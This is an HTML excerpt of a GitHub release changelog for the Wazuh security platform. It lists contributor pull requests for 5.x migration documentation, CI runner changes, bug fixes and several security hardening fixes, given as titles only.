<li>docs: add Active Response 4.x to 5.x migration guide by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jcorredor-spec/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jcorredor-spec">@jcorredor-spec</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4521476970" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36402" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36402/hovercard" href="https://github.com/wazuh/wazuh/pull/36402">#36402</a></li>
<li>Use env mappings for variable passing in builderpackage workflows by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4572105403" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36738" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36738/hovercard" href="https://github.com/wazuh/wazuh/pull/36738">#36738</a></li>
<li>Adds 4.x to 5.x migration documentation. by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rjcausarano/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rjcausarano">@rjcausarano</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4615736469" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36785" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36785/hovercard" href="https://github.com/wazuh/wazuh/pull/36785">#36785</a></li>
<li>Fix AWS cross-account SQS queue URL when using iam_role_arn by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fcontrerasc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fcontrerasc">@fcontrerasc</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4617279433" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36791" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36791/hovercard" href="https://github.com/wazuh/wazuh/pull/36791">#36791</a></li>
<li>Fix enrollment key validation and improve input handling by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4629562793" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36807" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36807/hovercard" href="https://github.com/wazuh/wazuh/pull/36807">#36807</a></li>
<li>Lower agent_sync_protocol and module sync log levels to reduce false-alarm noise by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4634109312" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36817" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36817/hovercard" href="https://github.com/wazuh/wazuh/pull/36817">#36817</a></li>
<li>Add unit tests for utils, aws_tools, DockerListener, gcloud and azure modules by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AnDumu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AnDumu">@AnDumu</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4591653615" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36761" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36761/hovercard" href="https://github.com/wazuh/wazuh/pull/36761">#36761</a></li>
<li>Normalize numeric inode to string events (6960) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hernanvalenzuela/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hernanvalenzuela">@hernanvalenzuela</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4641496397" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36837" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36837/hovercard" href="https://github.com/wazuh/wazuh/pull/36837">#36837</a></li>
<li>Prevent indexer consumer wait during shutdown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4640571004" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36836" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36836/hovercard" href="https://github.com/wazuh/wazuh/pull/36836">#36836</a></li>
<li>Update manager 5x documentation  by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4639437920" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36833" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36833/hovercard" href="https://github.com/wazuh/wazuh/pull/36833">#36833</a></li>
<li>Add bump-issue-link support to bumper workflow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4664679055" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36868" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36868/hovercard" href="https://github.com/wazuh/wazuh/pull/36868">#36868</a></li>
<li>Add guide for migrating manager coordinator from 4.x to 5.x by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4639020634" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36829" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36829/hovercard" href="https://github.com/wazuh/wazuh/pull/36829">#36829</a></li>
<li>Add Wazuh Manager Configuration documentation from 4.x to 5.x by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4611934920" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36779" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36779/hovercard" href="https://github.com/wazuh/wazuh/pull/36779">#36779</a></li>
<li>Add documentation to migrate filebeat to indexer connector by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4664131019" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36866" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36866/hovercard" href="https://github.com/wazuh/wazuh/pull/36866">#36866</a></li>
<li>wazuh-manager: Benchmark and footprint by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juliancnn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juliancnn">@juliancnn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4456748469" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36145" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36145/hovercard" href="https://github.com/wazuh/wazuh/pull/36145">#36145</a></li>
<li>Update manager upgrade block message by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4681713013" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36987" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36987/hovercard" href="https://github.com/wazuh/wazuh/pull/36987">#36987</a></li>
<li>5.x PR workflows improvements by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4596503652" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36766" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36766/hovercard" href="https://github.com/wazuh/wazuh/pull/36766">#36766</a></li>
<li>Add Manager 5.0 release notes and breaking changes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4648591326" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36850" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36850/hovercard" href="https://github.com/wazuh/wazuh/pull/36850">#36850</a></li>
<li>ci(gha): migrate server/manager workflows to AWS CodeBuild runners [main] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4692375185" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37012" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37012/hovercard" href="https://github.com/wazuh/wazuh/pull/37012">#37012</a></li>
<li>chore: update vulnerable Python framework dependencies by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4699088509" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37024" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37024/hovercard" href="https://github.com/wazuh/wazuh/pull/37024">#37024</a></li>
<li>Add Manager 5.0 wazuh-manager.conf configuration reference by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4691339394" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36999" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36999/hovercard" href="https://github.com/wazuh/wazuh/pull/36999">#36999</a></li>
<li>Add virustotal migration guide by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4692765810" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37013" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37013/hovercard" href="https://github.com/wazuh/wazuh/pull/37013">#37013</a></li>
<li>Add VD migration documentation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4692092118" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37008" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37008/hovercard" href="https://github.com/wazuh/wazuh/pull/37008">#37008</a></li>
<li>Add documentation for wpk upgrade by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4693271310" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37015" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37015/hovercard" href="https://github.com/wazuh/wazuh/pull/37015">#37015</a></li>
<li>Migrate agent build workflows to AWS CodeBuild runners by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4701880741" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37028" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37028/hovercard" href="https://github.com/wazuh/wazuh/pull/37028">#37028</a></li>
<li>XML Decoders migration to YAML by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4673566639" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36959" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36959/hovercard" href="https://github.com/wazuh/wazuh/pull/36959">#36959</a></li>
<li>CDB to KVDB migration guide by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4690514873" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36996" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36996/hovercard" href="https://github.com/wazuh/wazuh/pull/36996">#36996</a></li>
<li>Documentation of Agentless migration to 5.x by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4699204980" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37025" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37025/hovercard" href="https://github.com/wazuh/wazuh/pull/37025">#37025</a></li>
<li>Fix manager reload/restart silently fails by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4673792785" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36962" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36962/hovercard" href="https://github.com/wazuh/wazuh/pull/36962">#36962</a></li>
<li>Randomize key generation for installation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4651010813" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36861" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36861/hovercard" href="https://github.com/wazuh/wazuh/pull/36861">#36861</a></li>
<li>Retry vulnerability feed validation failures promptly by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4665777430" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36874" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36874/hovercard" href="https://github.com/wazuh/wazuh/pull/36874">#36874</a></li>
<li>Bump 5.0.0 branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4716517657" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37040" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37040/hovercard" href="https://github.com/wazuh/wazuh/pull/37040">#37040</a></li>
<li>Fix agent permanently stuck when TCP connection is silently half-closed by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4616576722" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36790" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36790/hovercard" href="https://github.com/wazuh/wazuh/pull/36790">#36790</a></li>
<li>ci(gha): migrate server/manager workflows to AWS CodeBuild runners [4.14.6] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4692373330" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37010" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37010/hovercard" href="https://github.com/wazuh/wazuh/pull/37010">#37010</a></li>
<li>ci(gha): migrate server/manager workflows to AWS CodeBuild runners [4.14.7] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4692374310" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37011" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37011/hovercard" href="https://github.com/wazuh/wazuh/pull/37011">#37011</a></li>
<li>fix: correct blob URL refs for release branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4718016446" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37046" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37046/hovercard" href="https://github.com/wazuh/wazuh/pull/37046">#37046</a></li>
<li>Use restricted wazuh-server user for Manager Indexer authentication by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4724661439" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37061" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37061/hovercard" href="https://github.com/wazuh/wazuh/pull/37061">#37061</a></li>
<li>fix(packages): use wazuh-manager-control in manager init.d scripts by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4724166255" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37059" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37059/hovercard" href="https://github.com/wazuh/wazuh/pull/37059">#37059</a></li>
<li>fix: Update the unclassified event doc by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juliancnn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juliancnn">@juliancnn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4726479817" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37126" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37126/hovercard" href="https://github.com/wazuh/wazuh/pull/37126">#37126</a></li>
<li>Skip vanished /proc entries during ports scan by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4650163579" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36859" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36859/hovercard" href="https://github.com/wazuh/wazuh/pull/36859">#36859</a></li>
<li>Fix RBAC permission check to verify allow effect in update_config rules by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4724800552" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37076" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37076/hovercard" href="https://github.com/wazuh/wazuh/pull/37076">#37076</a></li>
<li>Add destination confinement to worker non-merged and extra file sync paths by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4691222179" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36998" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36998/hovercard" href="https://github.com/wazuh/wazuh/pull/36998">#36998</a></li>
<li>Patch cluster authentication by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4716191480" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37039" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37039/hovercard" href="https://github.com/wazuh/wazuh/pull/37039">#37039</a></li>
<li>Lower stale-session indexer log to debug by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4733981786" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37150" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37150/hovercard" href="https://github.com/wazuh/wazuh/pull/37150">#37150</a></li>
<li>Limit recursion depth in XML parser by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4733223430" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37147" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37147/hovercard" href="https://github.com/wazuh/wazuh/pull/37147">#37147</a></li>
<li>Add status endpoint by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NahuFigueroa97/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NahuFigueroa97">@NahuFigueroa97</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4696177149" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37022" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37022/hovercard" href="https://github.com/wazuh/wazuh/pull/37022">#37022</a></li>
<li>Add log collectors reference docs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AnDumu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AnDumu">@AnDumu</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4721989446" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37057" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37057/hovercard" href="https://github.com/wazuh/wazuh/pull/37057">#37057</a></li>
<li>Run the Windows MSI package test on the AWS CodeBuild runner by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4738105790" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37165" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37165/hovercard" href="https://github.com/wazuh/wazuh/pull/37165">#37165</a></li>
<li>Remove merged.mg hash cache to fix stale syscollector flush by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hernanvalenzuela/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hernanvalenzuela">@hernanvalenzuela</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4720281364" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37048" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37048/hovercard" href="https://github.com/wazuh/wazuh/pull/37048">#37048</a></li>
<li>Enrich MITRE fields with id and names by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fcontrerasc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fcontrerasc">@fcontrerasc</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4721520471" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37054" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37054/hovercard" href="https://github.com/wazuh/wazuh/pull/37054">#37054</a></li>
<li>Reduce indexer connection warning noise by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jam300/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jam300">@jam300</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4696113780" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37021" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37021/hovercard" href="https://github.com/wazuh/wazuh/pull/37021">#37021</a></li>
<li>Remove deprecated wazuh-dbd daemon by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4715728814" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37035" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37035/hovercard" href="https://github.com/wazuh/wazuh/pull/37035">#37035</a></li>
<li>Bound decompressed size when processing sync archives by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4725313255" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37119" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37119/hovercard" href="https://github.com/wazuh/wazuh/pull/37119">#37119</a></li>
